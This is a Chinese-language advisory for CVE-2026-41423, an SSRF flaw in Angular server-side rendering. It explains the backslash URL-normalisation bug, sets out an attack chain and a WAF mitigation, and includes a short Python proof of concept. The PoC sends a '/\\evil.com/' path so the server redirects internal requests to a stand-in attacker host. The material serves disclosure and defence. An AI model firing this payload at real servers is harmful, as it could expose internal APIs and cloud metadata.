CVE-2026-41423 CVSS 5.3 中危

CVE-2026-41423 Angular平台SSRF漏洞

披露日期: 2026-05-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41423

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Angular

漏洞概述

Angular是一款流行的Web开发平台。在特定版本之前，其@angular/platform-server组件存在服务器端请求伪造（SSRF）漏洞。攻击者通过构造包含反斜杠的恶意请求（如`GET /\evil.com/`），可利用URL解析机制缺陷，欺骗服务器认为当前源为攻击者控制域名。这导致应用内部的相对HTTP请求被重定向至攻击者服务器，进而可能造成内部API或敏感元数据泄露。厂商已发布修复版本。

技术细节

该漏洞源于Angular在服务器端渲染（SSR）期间对URL处理逻辑的缺陷。具体而言，当服务器引擎（如Express）接收到包含反斜杠的畸形请求，例如 `GET /\evil.com/` 时，会将URL字符串传递给Angular的渲染函数。Angular内部的URL解析器在处理HTTP/HTTPS协议时，会将反斜杠 `\` 规范化为正斜杠 `/`。这一过程导致应用的内部状态被劫持，错误地判定当前的请求源为攻击者控制的目标域名。由于应用误认为攻击者的域名为本地源，后续发起的任何相对路径的HttpClient请求或对PlatformLocation.hostname的引用都会被解析并重定向到攻击者指定的服务器。攻击者可利用此机制，诱导受害服务器向内网发起请求，探测或窃取内部API、元数据服务及其他敏感信息，造成信息泄露风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用的是存在漏洞的Angular版本，并启用了服务器端渲染（SSR）。

STEP 2

漏洞利用

攻击者向服务器发送特制的HTTP请求，例如在URL路径中包含反斜杠（`GET /\evil.com/`）。

STEP 3

劫持上下文

Angular的URL解析器将反斜杠规范化，导致内部状态误认为当前源是攻击者控制的域名。

STEP 4

数据泄露

应用程序后续发出的相对路径请求被重定向到攻击者的服务器，导致内部API或元数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41423
# This script demonstrates how a malformed request with a backslash
# can trick the Angular server into changing the origin context.

import requests

def trigger_ssrf(target_url):
    """
    Sends a request with a backslash to exploit the URL normalization issue.
    Example: http://target.com/\evil.com/
    """
    # The payload includes a backslash which is normalized to a forward slash
    # causing the server to treat 'evil.com' as the origin.
    payload = "/\\evil.com/"
    
    try:
        full_url = target_url + payload
        print(f"Sending request to: {full_url}")
        
        response = requests.get(full_url)
        
        if response.status_code == 200:
            print("Request successful. Check if the application made external requests to evil.com.")
        else:
            print(f"Received status code: {response.status_code}")
            
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual vulnerable server URL
    target = "http://localhost:4200"
    trigger_ssrf(target)

影响范围

Angular < 19.2.21

Angular < 20.3.19

Angular < 21.2.9

Angular < 22.0.0-next.8

防御指南

临时缓解措施

如果无法立即升级，建议在Web应用防火墙（WAF）或反向代理上配置规则，阻止URL中包含反斜杠（\）的请求到达Angular应用服务器，从而利用URL规范化特性缓解漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表